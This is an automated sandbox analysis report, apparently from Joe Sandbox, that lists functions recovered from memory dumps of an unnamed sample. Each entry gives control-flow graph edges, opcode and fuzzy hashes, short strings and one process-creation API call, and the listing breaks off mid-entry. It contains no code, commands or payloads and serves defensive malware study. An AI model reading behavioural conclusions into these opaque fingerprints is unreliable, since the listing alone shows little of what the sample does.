                            control_flow_graph 653 5e72d98-5e72d99 654 5e72d9d-5e72fa3 653->654 655 5e72d9b-5e72d9c 653->655 680 5e72faa 654->680 655->654 681 5e72fb2-5e72fd7 680->681 684 5e7503d-5e752eb 681->684 685 5e72fdd-5e73cf0 681->685 752 5e752f1-5e761c8 684->752 753 5e761d0-5e76e1f 684->753 1084 5e73cf6-5e74068 685->1084 1085 5e74070-5e75035 685->1085 752->753 1212 5e76e27-5e76e35 753->1212 1084->1085 1085->684 1216 5e76e3d-5e7716a 1212->1216 1314 5e774f0-5e77503 1216->1314 1315 5e77170-5e774e8 1216->1315 1319 5e77b45-5e789ba 1314->1319 1320 5e77509-5e77b3d 1314->1320 1315->1314 1699 5e789c1-5e789d7 1319->1699 1320->1319 1703 5e789d7 call 5e7a490 1699->1703 1704 5e789d7 call 5e7a45d 1699->1704 1705 5e789d7 call 5e7a46c 1699->1705 1701 5e789dd-5e789e4 1703->1701 1704->1701 1705->1701
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d02c858e62864cf000be3f7637543d6bb68d52053bb0eda7d932a10d2ce03af3
                            • Instruction ID: b0abb15399a00fd364ce37e71db8df562b1355ce29c50be37770eedfbe772337
                            • Opcode Fuzzy Hash: d02c858e62864cf000be3f7637543d6bb68d52053bb0eda7d932a10d2ce03af3
                            • Instruction Fuzzy Hash: 71B33570A15618CFCB68EF39D9996ACBBB2FB89201F0085E9D089A3754DF355E84CF41
                            Function 05E72DA0 Relevance: 5.5, Instructions: 5499COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1706 5e72da0-5e72fd7 1734 5e7503d-5e752eb 1706->1734 1735 5e72fdd-5e73cf0 1706->1735 1802 5e752f1-5e761c8 1734->1802 1803 5e761d0-5e7716a 1734->1803 2134 5e73cf6-5e74068 1735->2134 2135 5e74070-5e75035 1735->2135 1802->1803 2364 5e774f0-5e77503 1803->2364 2365 5e77170-5e774e8 1803->2365 2134->2135 2135->1734 2369 5e77b45-5e789d7 2364->2369 2370 5e77509-5e77b3d 2364->2370 2365->2364 2753 5e789d7 call 5e7a490 2369->2753 2754 5e789d7 call 5e7a45d 2369->2754 2755 5e789d7 call 5e7a46c 2369->2755 2370->2369 2751 5e789dd-5e789e4 2753->2751 2754->2751 2755->2751
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3292adeeed4476542d69949f573f3f3bbba44b40fa107c2fac5739274b4845bc
                            • Instruction ID: e67a7c1899a3bc669d4f818a9d74c1ed7e51f5fcb506334e6e047f3afbf76336
                            • Opcode Fuzzy Hash: 3292adeeed4476542d69949f573f3f3bbba44b40fa107c2fac5739274b4845bc
                            • Instruction Fuzzy Hash: 97B33570A15618CFCB68EF39D9996ACBBB2FB89201F0085E9D089A3754DF355E84CF41
                            Function 02404B0E Relevance: 5.5, Strings: 2, Instructions: 2977COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2756 2404b0e-2404bbc 2760 2404bc2-2404cbc 2756->2760 2761 2404cc4-2404cc6 2756->2761 2760->2761 2762 2404cc8-2404ccb 2761->2762 2763 2404ccd-2404cdd 2761->2763 2764 2404d0b-240614a 2762->2764 2769 2404cf2-2404d08 2763->2769 2770 2404cdf-2404cf0 2763->2770 3026 2406150-24061d8 2764->3026 3027 2407dfb 2764->3027 2769->2764 2770->2764 3408 24061de call 2408d80 3026->3408 3409 24061de call 2408d90 3026->3409 3028 2407e00-2407e14 3027->3028 3032 2407e16-2407e19 3028->3032 3033 2407e1c-2407e24 3028->3033 3032->3033 3035 2407e25-2407e39 3033->3035 3036 2407e3d-2407e56 3033->3036 3035->3036 3037 2407e98-2407ea0 3036->3037 3038 2407e58-2407e96 3036->3038 3040 2407ea5-2407ecc 3037->3040 3038->3037 3041 2407ef8-2407f0d 3040->3041 3042 2407ece-2407edf 3040->3042 3043 2407ee0-2407eec 3041->3043 3044 2407f0f-2407f44 3041->3044 3042->3043 3043->3040 3048 2407eee-2407ef6 3043->3048 3046 2407f74-2407f88 3044->3046 3047 2407f46-2407f49 3044->3047 3051 2407fe5-2408018 3046->3051 3052 2407f8a-2407f8e 3046->3052 3049 2407f64-2407f72 3047->3049 3050 2407f4b-2407f60 3047->3050 3048->3041 3049->3046 3050->3049 3055 24061e1-24063d4 3079 24063da-24064c9 3055->3079 3080 24064ce-24065bc 3055->3080 3101 24065bf-2407b49 3079->3101 3080->3101 3101->3028 3373 2407b4f-2407b6f call 2122143 3101->3373 3374 2407b74-2407c8a 3373->3374 3374->3028 3386 2407c90-2407c95 3374->3386 3387 2407cb4-2407d8b 3386->3387 3388 2407c97-2407caf 3386->3388 3387->3028 3403 2407d8d-2407dc0 3387->3403 3389 2407dc6-2407dfa 3388->3389 3403->3389 3408->3055 3409->3055
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: G$s2"m^
                            • API String ID: 0-3916562061
                            • Opcode ID: 25ad30a7dc37370a381be8a5ef64a1e0075f5fa8de8cbc84c3292b2b04b2e74c
                            • Instruction ID: 7c40f6b124d2e41ba57d68cc43a3351c65e7fa65865921b8713e9c6d4c3882f3
                            • Opcode Fuzzy Hash: 25ad30a7dc37370a381be8a5ef64a1e0075f5fa8de8cbc84c3292b2b04b2e74c
                            • Instruction Fuzzy Hash: B3436870E14618CBCB58EFB8DAC869DBBB1FB88200F4085EDD549A3254DE356D84CF65
                            Function 023FC8B8 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3410 23fc8b8-23fc8dd 3411 23fc8df 3410->3411 3412 23fc8e4-23fc908 3410->3412 3411->3412 3413 23fc909 3412->3413 3414 23fc910-23fc92c 3413->3414 3415 23fc92e 3414->3415 3416 23fc935-23fc936 3414->3416 3415->3413 3415->3416 3417 23fcafb-23fcb2e call 23f6248 3415->3417 3418 23fc93b-23fc95f 3415->3418 3419 23fcb5b-23fcb64 3415->3419 3420 23fcb36-23fcb48 3415->3420 3421 23fca12-23fca25 3415->3421 3422 23fcab0-23fcac8 3415->3422 3423 23fca8e-23fca91 3415->3423 3424 23fc9ce-23fc9e6 3415->3424 3425 23fcb4d-23fcb56 3415->3425 3426 23fca2a-23fca5d call 23fabf8 3415->3426 3427 23fc988-23fc990 3415->3427 3428 23fca65-23fca68 call 23fcbc0 3415->3428 3429 23fc961-23fc972 3415->3429 3416->3419 3417->3420 3418->3414 3420->3414 3421->3414 3443 23fcadb-23fcae2 3422->3443 3444 23fcaca-23fcad9 3422->3444 3438 23fca9a-23fcaab 3423->3438 3448 23fc9f9-23fca00 3424->3448 3449 23fc9e8-23fc9f7 3424->3449 3425->3414 3426->3428 3430 23fc997-23fc9a2 3427->3430 3436 23fca6e-23fca89 3428->3436 3445 23fc974-23fc986 3429->3445 3446 23fc992-23fc994 3429->3446 3433 23fc9b5-23fc9bc 3430->3433 3434 23fc9a4-23fc9b3 3430->3434 3447 23fc9c3-23fc9c9 3433->3447 3434->3447 3436->3414 3438->3414 3450 23fcae9-23fcaf6 3443->3450 3444->3450 3445->3414 3446->3430 3447->3414 3453 23fca07-23fca0d 3448->3453 3449->3453 3450->3414 3453->3414
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: e\1$e\1$"*p$"*p
                            • API String ID: 0-1513742261
                            • Opcode ID: 6a3abf27c7580289181222b5af600cd580353d3d3a464e6df00dc5808cbe2435
                            • Instruction ID: 819feb391ce0547cbcd0d68817da7ba3e20db2c590b174aa9b8ea0311728f850
                            • Opcode Fuzzy Hash: 6a3abf27c7580289181222b5af600cd580353d3d3a464e6df00dc5808cbe2435
                            • Instruction Fuzzy Hash: 508112B0D012198FCB44CFA5E9446EEBBF6BF88340F20A92AD916BB254D7385A01CF54
                            Function 023F5230 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3546 23f5230-23f524a 3547 23f524c 3546->3547 3548 23f5251-23f52fc 3546->3548 3547->3548 3558 23f52ff 3548->3558 3559 23f5306-23f5322 3558->3559 3560 23f532b-23f532c 3559->3560 3561 23f5324 3559->3561 3563 23f549b-23f54a1 3560->3563 3561->3558 3561->3560 3562 23f534d-23f53dd 3561->3562 3561->3563 3564 23f5464-23f5468 3561->3564 3565 23f5331-23f534b 3561->3565 3566 23f5410-23f544f 3561->3566 3583 23f53df-23f53ee 3562->3583 3584 23f53f0-23f53f7 3562->3584 3567 23f547b-23f5482 3564->3567 3568 23f546a-23f5479 3564->3568 3565->3559 3586 23f5451 call 23f6a20 3566->3586 3587 23f5451 call 23f6a10 3566->3587 3571 23f5489-23f5496 3567->3571 3568->3571 3571->3559 3580 23f5457-23f545f 3580->3559 3585 23f53fe-23f540b 3583->3585 3584->3585 3585->3559 3586->3580 3587->3580
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6f$6f
                            • API String ID: 0-3590766845
                            • Opcode ID: 08ed7d2dda264b440fd7c04f4a5805e5d35e0f59444c5489fa07ec63384dadba
                            • Instruction ID: 2dfefa9f520963515b87c51305b83db3a4e35a37522b338aaa18efad7ae382d5
                            • Opcode Fuzzy Hash: 08ed7d2dda264b440fd7c04f4a5805e5d35e0f59444c5489fa07ec63384dadba
                            • Instruction Fuzzy Hash: 6571D5B4E00208DFDB48CFA9D58569EBBF6FF89301F60812AD906A7364DB789941CF51
                            Function 02402B20 Relevance: 2.0, Strings: 1, Instructions: 792COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3627 2402b20-2402d1c 3654 2402d22-2402e01 3627->3654 3655 2403465-240346c 3627->3655 3669 2402e07-2402f1e 3654->3669 3670 240346f-240348a 3654->3670 3709 2402f24-2403205 3669->3709 3710 240333b-240344f 3669->3710 3673 24034d2-24034ed 3670->3673 3674 240348c-24034be 3670->3674 3675 2403530-240354c 3673->3675 3676 24034f0-24034fe 3673->3676 3678 2403500-2403521 call 240354d 3674->3678 3679 24034c0-24034c6 3674->3679 3681 2403593-2403598 3675->3681 3676->3678 3678->3681 3686 2403523-240352c 3678->3686 3684 24035b0-2403659 3681->3684 3685 240359a-24035af 3681->3685 3685->3684 3686->3675 3763 2403207-2403212 3709->3763 3764 240321a-240332c 3709->3764 3710->3655 3744 2403451-240345c 3710->3744 3744->3655 3763->3764 3764->3670 3783 2403332-2403335 3764->3783 3783->3709 3783->3710
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: F
                            • API String ID: 0-2945319695
                            • Opcode ID: 866519e130c008cb70f0b378f9a95eae9252ceea879343522c1119cce38548a8
                            • Instruction ID: eed5fc3b05bff2c6f47a47dfdb1a5fe07ba57b262e3a19e126f62c5870c9423e
                            • Opcode Fuzzy Hash: 866519e130c008cb70f0b378f9a95eae9252ceea879343522c1119cce38548a8
                            • Instruction Fuzzy Hash: 7D52DE30E04315CFCB09EFB9D994A5DBBB2FF89200F4185AAD049EB355DA35AC85CB51
                            Function 023FC338 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4000 23fc338-23fc3c3 4002 23fc3ce-23fc3d5 4000->4002 4003 23fc3c5-23fc3cb 4000->4003 4004 23fc3d7-23fc3dd 4002->4004 4005 23fc3e0-23fc3f8 4002->4005 4003->4002 4004->4005 4006 23fc3fa-23fc406 4005->4006 4007 23fc409-23fc4b6 CreateProcessAsUserW 4005->4007 4006->4007 4009 23fc4bf-23fc53e 4007->4009 4010 23fc4b8-23fc4be 4007->4010 4017 23fc550-23fc557 4009->4017 4018 23fc540-23fc546 4009->4018 4010->4009 4019 23fc56e 4017->4019 4020 23fc559-23fc568 4017->4020 4018->4017 4020->4019
                            APIs
                            • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 023FC4A3
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID: CreateProcessUser
                            • String ID:
                            • API String ID: 2217836671-0
                            • Opcode ID: 8f152377a20bf8cc6efb58a6daebee0721540e934d9c6006dea12f62fe04046c
                            • Instruction ID: 800471207d55719f787e396a25542ac3c08fb1bf97e7f7e598129a24aa1813cc
                            • Opcode Fuzzy Hash: 8f152377a20bf8cc6efb58a6daebee0721540e934d9c6006dea12f62fe04046c
                            • Instruction Fuzzy Hash: 3751167190022DDFDB24CF99D840BDEBBB5BF48314F0484AAE908B7250DB759A85DF90
                            Function 05E7F677 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: kQD
                            • API String ID: 0-3066535408
                            • Opcode ID: d287d26d36e8da01d136e674528d4eb3eac34b755a02b0b6b4b2b170b89b36dd
                            • Instruction ID: 0a897b3a287f0553aa599d029a1a794eda1a286aee09485bd49c594c4cf9c642
                            • Opcode Fuzzy Hash: d287d26d36e8da01d136e674528d4eb3eac34b755a02b0b6b4b2b170b89b36dd
                            • Instruction Fuzzy Hash: 7EC14B75D1420ADFDB04CFA9C4808AEFBF6FF89301B15D1A9C466A7215D7389942CF90
                            Function 05E7F6B0 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: kQD
                            • API String ID: 0-3066535408
                            • Opcode ID: 1111d7b8b6fef53d649d7e66bf949a1cce8daa43e69ca6d00626b0df582bb70d
                            • Instruction ID: 2a697092168d48d1661b96a30641cb5e4170f00638537be831cb7765fc987431
                            • Opcode Fuzzy Hash: 1111d7b8b6fef53d649d7e66bf949a1cce8daa43e69ca6d00626b0df582bb70d
                            • Instruction Fuzzy Hash: 5CC15B75D14209EFCB04CFA9D4808AEFBB6FF89301B14D569C466AB314D738A942CF94
                            Function 023F522B Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6f
                            • API String ID: 0-3135077484
                            • Opcode ID: 62ac0ba022459c8181f65a46e630dc76e73be404e11b2c932591afe5dd34a6be
                            • Instruction ID: f489b7121bf14298b90593b708b0b6d0b6e5fe615ab3e263db1f0aab13d92b55
                            • Opcode Fuzzy Hash: 62ac0ba022459c8181f65a46e630dc76e73be404e11b2c932591afe5dd34a6be
                            • Instruction Fuzzy Hash: 6A71D7B4E00208DFDB48DFA9D48569EBBF6FF89301F20812AD906A7364DB789945CF51
                            Function 0240F510 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: >NG
                            • API String ID: 0-1926143806
                            • Opcode ID: 766c6351baad30b6f7ba69167989c6bd94689641892aacbff17536b3693521a9
                            • Instruction ID: 7b975dbe780fd67bdc0e5d6b85b5e0b53c4314e2ecaaf9bc492fe8f1be4edd16
                            • Opcode Fuzzy Hash: 766c6351baad30b6f7ba69167989c6bd94689641892aacbff17536b3693521a9
                            • Instruction Fuzzy Hash: 2A514AB0E042198FDB18CFA9C5806AEFBF2BF89201F15C57AD415B7255E7388981CFA4
                            Function 02409498 Relevance: 1.4, Instructions: 1393COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a094dc8825898913bb1c4ac3062f7cfa68b5e5fea267b64443972065cc976679
                            • Instruction ID: 89b664bb4cd0095895609c5558423c16a2f2e3eeb5f4182819dbc1a8069e2a98
                            • Opcode Fuzzy Hash: a094dc8825898913bb1c4ac3062f7cfa68b5e5fea267b64443972065cc976679
                            • Instruction Fuzzy Hash: 92C2AE70E10228CFC758EFB9D984B9DB7B2FB88300F4085A9D449A3394DE396D99DB51
                            Function 0240F520 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: >NG
                            • API String ID: 0-1926143806
                            • Opcode ID: 2d9dc9832d6cf3041f0ff2847fe8d11d08ed58423e62cd2fdaa43df4bdbdb882
                            • Instruction ID: fbbadff595c2301273f61137eb456866a6078da737cfa7ec6504e908cd4a83bc
                            • Opcode Fuzzy Hash: 2d9dc9832d6cf3041f0ff2847fe8d11d08ed58423e62cd2fdaa43df4bdbdb882
                            • Instruction Fuzzy Hash: 3D513BB0E042198FDB18CFA9C5806AEFBF2BF88201F15C53AD415B7255D7389985CFA4
                            Function 0240CFF0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: <
                            • API String ID: 0-4251816714
                            • Opcode ID: f28f45d8bacdbb92ed65a2ce1816142684e402cd1bacb39c6543ac61bce86bdf
                            • Instruction ID: 0e418c3db78d9df1e3b5152bfda9a09fe5ca94601b374adc842ec6b22de5f4f8
                            • Opcode Fuzzy Hash: f28f45d8bacdbb92ed65a2ce1816142684e402cd1bacb39c6543ac61bce86bdf
                            • Instruction Fuzzy Hash: 74514375E01658CFDB58CFAAC9446DDBBF2AFC9305F14C0AA9409AB264DB345A85CF40
                            Function 0240CFE0 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: <
                            • API String ID: 0-4251816714
                            • Opcode ID: 264c33d6441772a1f6950e6401706ca59b91837d168778a3ec4ff46a660e523e
                            • Instruction ID: 3d1d54e481b7fc57458c446c84626d2db9c2ef3a2cfb43610408ee4834db2018
                            • Opcode Fuzzy Hash: 264c33d6441772a1f6950e6401706ca59b91837d168778a3ec4ff46a660e523e
                            • Instruction Fuzzy Hash: 46517571E01658CFDB59CFAAC9846DDBBF2AFC9300F14C1AAD409AB264DB345A85CF40
                            Function 02402B11 Relevance: .7, Instructions: 651COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58e86235020edd80bef4bd801c231fb543a01dd2054781c44f561dbac43c6b63
                            • Instruction ID: 128ceb81da886c7a568325361f0adeb1ac786012845f5812adbf727331b2618d
                            • Opcode Fuzzy Hash: 58e86235020edd80bef4bd801c231fb543a01dd2054781c44f561dbac43c6b63
                            • Instruction Fuzzy Hash: 4E42BB30E10615CFCB08EFB9D994A5EBBF2FF89200F51C5AAD049A7354DE35AC858B91
                            Function 02123370 Relevance: .5, Instructions: 509COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13eae382aafbbcef9d8e1982744ca8271bf26b206e248a1954759724e2d6d6a0
                            • Instruction ID: 900ee28274859152f432be7780fca5f41ea2ff3b1f6aaa24cfa644e7807c1765
                            • Opcode Fuzzy Hash: 13eae382aafbbcef9d8e1982744ca8271bf26b206e248a1954759724e2d6d6a0
                            • Instruction Fuzzy Hash: BD128E70A002199FDB18CF69D854BAEBBF6BF88310F2085A9E856DB350DB38DD55CB50
                            Function 02123988 Relevance: .4, Instructions: 444COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3514167939.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2120000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 441e05b02c6dc0e849a0cb82df79aa4d83c8703d481900da206ee03f80190073
                            • Instruction ID: 35a313cac111e20d5be63394e97b52dae4a34490bc3752b5e2df45314c471804
                            • Opcode Fuzzy Hash: 441e05b02c6dc0e849a0cb82df79aa4d83c8703d481900da206ee03f80190073
                            • Instruction Fuzzy Hash: 7B026F31A40219DFCB14CF69C984AADBBB2FF88304F5584A5F825EB261D739DC69CB50
                            Function 05E7E60C Relevance: .4, Instructions: 354COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3517289518.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5e70000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d2744988e4a7348a787ba33298ff061dc7892aeeee92a632ff63a239d760e6f
                            • Instruction ID: 841c04989c2794b3fc0294d36f9950ab9cc257b2a78b96b985edafdb840d8db3
                            • Opcode Fuzzy Hash: 5d2744988e4a7348a787ba33298ff061dc7892aeeee92a632ff63a239d760e6f
                            • Instruction Fuzzy Hash: 12413A70D002588FEB18CFA6C894ADEBBF6BF89310F14C5EAD445A7254DB346A85CF50
                            Function 023F7460 Relevance: .3, Instructions: 319COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 375041d0dc274c3876644d5f0a6a222fc6d755a4898178139377b13da5d7dca1
                            • Instruction ID: 52b36ba94d15e1e0dafeff16f2ef2df264e0076a724c801bb0df7fbbe27d9891
                            • Opcode Fuzzy Hash: 375041d0dc274c3876644d5f0a6a222fc6d755a4898178139377b13da5d7dca1
                            • Instruction Fuzzy Hash: 5CE1F670E112698FCB64CF69D944B9DFBF6BF88300F1096EAD50AA7255D734AA81CF00
                            Function 023F7450 Relevance: .3, Instructions: 284COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fe337c3227d08b0eb98713fc032dd2f0022ed06a2b2f056af6c3601b0ea3d74e
                            • Instruction ID: 263eafc460ddc086070b276be265cc5149f18ba0f13d8be4356d77377ec7bd0d
                            • Opcode Fuzzy Hash: fe337c3227d08b0eb98713fc032dd2f0022ed06a2b2f056af6c3601b0ea3d74e
                            • Instruction Fuzzy Hash: BDD1F770E012698FDB65CF69D944B9DFBF6BF88200F1086EAD50DAB255D774AA81CF00
                            Function 0240EBE0 Relevance: .3, Instructions: 256COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 21b791a18d6a86cee6cf2554c4f78c6c314de27c595189380f1e72a4aadfad4e
                            • Instruction ID: 450041900ba032d6706384b3cfdf80fe9069415e81703ca48752b30f5333b070
                            • Opcode Fuzzy Hash: 21b791a18d6a86cee6cf2554c4f78c6c314de27c595189380f1e72a4aadfad4e
                            • Instruction Fuzzy Hash: 43B148B0E042498FDB09CFA9C8906DEFBF2FF89310F24856AD455AB2A5D7355886CF50
                            Function 023F7976 Relevance: .3, Instructions: 252COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f27a76ec0f70e4eaa8b5b8529e3214046d2573d5272dca9fa1af4c3985e1d6c
                            • Instruction ID: f4b0c4455bbe124793d1328fd72b76dab0cca90592027148ee554060f2858d83
                            • Opcode Fuzzy Hash: 3f27a76ec0f70e4eaa8b5b8529e3214046d2573d5272dca9fa1af4c3985e1d6c
                            • Instruction Fuzzy Hash: DCC1E574A112698FCB65CF24E944B9DFBF6FB88200F1096EAD50AA7255D734AE81CF00
                            Function 023FCBC0 Relevance: .2, Instructions: 232COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515357431.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_23f0000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d22768c82fe469f28ab2778b6551b62549d880d903cf782e89f14c9e53094748
                            • Instruction ID: ffe06fa085633f8765fcbe0d5440470c1f736968caa7d7e8d51e69c21d67bd42
                            • Opcode Fuzzy Hash: d22768c82fe469f28ab2778b6551b62549d880d903cf782e89f14c9e53094748
                            • Instruction Fuzzy Hash: D3A11570E4420CCFCB48CFA9E995ADDBBB6FB89301F10A92AD516BB264E7345801CF15
                            Function 0240EC7B Relevance: .2, Instructions: 216COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.3515413176.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f369c7dbafcccf9db59d6c6c6b96d46f0501499da46da86996534d04987b7a5f
